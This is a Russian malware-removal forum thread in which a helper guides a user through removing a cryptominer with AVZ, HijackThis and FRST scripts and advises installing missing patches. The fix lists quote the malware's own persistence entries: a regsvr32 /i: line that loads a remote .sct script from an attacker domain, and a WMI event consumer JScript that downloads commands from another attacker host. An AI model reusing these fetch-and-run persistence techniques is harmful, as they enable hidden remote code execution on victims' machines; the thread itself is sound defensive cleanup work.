Показано с 1 по 13 из 13.

Зависания при загрузке ОС [Trojan.Win32.Miner.tvnc, not-a-virus:RiskTool.Win32.BitMiner.qsa ] (заявка № 218482)

  1. #1
    Junior Member Репутация
    Регистрация
    26.09.2008
    Сообщений
    69
    Вес репутации
    36

    Thumbs up Зависания при загрузке ОС [Trojan.Win32.Miner.tvnc, not-a-virus:RiskTool.Win32.BitMiner.qsa ]

    Здравствуйте.
    Недавно заметил, что при загрузке ОС она начинает сильно тормозить. Это происходит до тех пор, пока не запущу Диспетчер задач. В автозагрузке обнаружил подозрительный ключ в реестре, запускающий сайт js.5b6b7b.ru (отключил загрузку данного адреса в CCleaner, чтобы Вы видели полностью параметр запуска). Подозреваю, что на компьютер, в моё отсутствие было установлено вредоносное ПО.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,452
    Вес репутации
    347
    Уважаемый(ая) Sway, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    26.09.2008
    Сообщений
    69
    Вес репутации
    36
    Ап теме.

  5. #4
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    28,122
    Вес репутации
    869
    Выполните скрипт в AVZ:
    Код:
    begin
     TerminateProcessByName('c:\program files (x86)\common files\conime.exe');
     StopService('Windows Audio Control');
     QuarantineFile('c:\program files (x86)\common files\conime.exe', '');
     QuarantineFile('c:\windows\debug\item.dat', '');
     QuarantineFile('c:\windows\debug\ok.dat', '');
     QuarantineFile('C:\Windows\help\lsmosee.exe', '');
     QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
     QuarantineFile('C:\Windows\syswow64\lsmos.exe', '');
     DeleteFile('a.exe&gt', '32');
     DeleteFile('c:\program files (x86)\common files\conime.exe', '32');
     DeleteFile('c:\windows\debug\item.dat&gt', '32');
     DeleteFile('c:\windows\debug\item.dat', '32');
     DeleteFile('c:\windows\debug\ok.dat', '32');
     DeleteFile('C:\Windows\help\lsmosee.exe', '32');
     DeleteFile('C:\WINDOWS\mssecsvc.exe', '32');
     DeleteFile('C:\Windows\syswow64\lsmos.exe', '32');
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa1" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa2" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "Mysa3" /F', 0, 15000, true);
     ExecuteFile('schtasks.exe', '/delete /TN "ok" /F', 0, 15000, true);
     DeleteService('mssecsvc2.0');
     DeleteService('Windows Audio Control');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteRepair(22);
     ExecuteWizard('SCU', 2, 2, true);
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    Запустите HijackThis, расположенный в папке Autologger и пофикситеWindows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
    Код:
    O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/09) - {480c106c-87e8-49f7-bdb0-b7536c7cc423} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
    O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)
    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  6. Это понравилось:


  7. #5
    Junior Member Репутация
    Регистрация
    26.09.2008
    Сообщений
    69
    Вес репутации
    36
    Добрый вечер.
    Логи во вложении (архив без пароля), карантин отослал.
    Вложения Вложения

  8. #6
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    28,122
    Вес репутации
    869
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    CreateRestorePoint:
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.5b6b7b.ru:280/v.sct scrobj.dll <==== ATTENTION
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.apeha.ru
    S3 McComponentHostService; "C:\Program Files\McAfee Security Scan\3.11.561\McCHSvc.exe" [X]
    Virustotal: C:\Windows\system32\a.exe
    2018-04-14 23:25 - 2018-04-14 23:25 - 000894464 _____ (TODO: <公司名>) C:\Windows\system32\a.exe
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен автоматически.

    Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
    Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
    Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
    Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
    Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

    Приложите этот файл к своему следующему сообщению.
    WBR,
    Vadim

  9. Это понравилось:


  10. #7
    Junior Member Репутация
    Регистрация
    26.09.2008
    Сообщений
    69
    Вес репутации
    36
    Логи во вложении.
    Вложения Вложения

  11. #8
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    28,122
    Вес репутации
    869
    Автоматическое обновление отключено
    Оттого не установлено множество критических патчей:
    HotFix KB3115858 Внимание! Скачать обновления
    HotFix KB3140735 Внимание! Скачать обновления
    HotFix KB3138910 Внимание! Скачать обновления
    HotFix KB3138962 Внимание! Скачать обновления
    HotFix KB3145739 Внимание! Скачать обновления
    HotFix KB3146963 Внимание! Скачать обновления
    HotFix KB3156013 Внимание! Скачать обновления
    HotFix KB3156016 Внимание! Скачать обновления
    HotFix KB3156019 Внимание! Скачать обновления
    HotFix KB3155178 Внимание! Скачать обновления
    HotFix KB3153171 Внимание! Скачать обновления
    HotFix KB3170455 Внимание! Скачать обновления
    HotFix KB3178034 Внимание! Скачать обновления
    HotFix KB3185911 Внимание! Скачать обновления
    HotFix KB3184122 Внимание! Скачать обновления
    HotFix KB3192391 Внимание! Скачать обновления
    HotFix KB3197867 Внимание! Скачать обновления
    HotFix KB3205394 Внимание! Скачать обновления
    HotFix KB4012212 Внимание! Скачать обновления
    HotFix KB4019263 Внимание! Скачать обновления
    HotFix KB4022722 Внимание! Скачать обновления
    HotFix KB4015546 Внимание! Скачать обновления
    HotFix KB4025337 Внимание! Скачать обновления
    HotFix KB4034679 Внимание! Скачать обновления
    HotFix KB4041678 Внимание! Скачать обновления
    HotFix KB4056894 Внимание! Скачать обновления
    HotFix KB4056897 Внимание! Скачать обновления
    HotFix KB4074587 Внимание! Скачать обновления
    В том числе KB4012212, через уязвимость, которую он затыкает, внедряют нашумевшие в прошлом году шифровальщики WannaCry и Petya/NotPetya, и майнеры, как в вашем случае.
    Adobe Flash Player 11 ActiveX v.11.7.700.224 Внимание! Скачать обновления
    Adobe Flash Player 21 NPAPI v.21.0.0.242 Внимание! Скачать обновления
    Adobe Flash Player 28 PPAPI v.28.0.0.161 Внимание! Скачать обновления
    Через необновлённые продукты Adobe тоже много заразы лезет.

    Проблема решена?
    WBR,
    Vadim

  12. Это понравилось:


  13. #9
    Junior Member Репутация
    Регистрация
    26.09.2008
    Сообщений
    69
    Вес репутации
    36
    Спасибо огромное за помощь. Проблема решена. В процессах загружены 2 файла conhost.exe. Они безопасны или это остатки майнера?

  14. #10
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    28,122
    Вес репутации
    869
    Если снова майнер не словили, т. е. нагрузки нет - то системный.
    WBR,
    Vadim

  15. Это понравилось:


  16. #11
    Junior Member Репутация
    Регистрация
    26.09.2008
    Сообщений
    69
    Вес репутации
    36
    Нет, нагрузки нет. Спасибо огромное за помощь, тему можно закрыть.

  17. #12
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    28,122
    Вес репутации
    869
    Удалите папку C:\FRST со всем содержимым.

    Выполните рекомендации после лечения.

  18. #13
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    48,317
    Вес репутации
    955

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 3
    • В ходе лечения обнаружены вредоносные программы:
      1. c:\program files (x86)\common files\conime.exe - Trojan.Win32.Miner.tvnc
      2. c:\windows\help\lsmosee.exe - HEUR:Trojan.Win32.Generic
      3. c:\windows\syswow64\lsmos.exe - not-a-virus:RiskTool.Win32.BitMiner.qsa


  • Уважаемый(ая) Sway, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Карантин 54E98EFC8DFC749F1DD89B98D70C45F3 [Trojan.Win32.BitMiner.z, Trojan.Win32.BitMiner.jl, not-a-virus:RiskTool.Win32.BitCoinMiner.fqs ]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 2
      Последнее сообщение: 12.02.2017, 02:23
    2. Ответов: 21
      Последнее сообщение: 31.01.2015, 15:31
    3. Ответов: 12
      Последнее сообщение: 26.12.2014, 18:54
    4. Ответов: 10
      Последнее сообщение: 20.11.2014, 22:54
    5. Ответов: 3
      Последнее сообщение: 12.01.2014, 18:38

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00377 seconds with 17 queries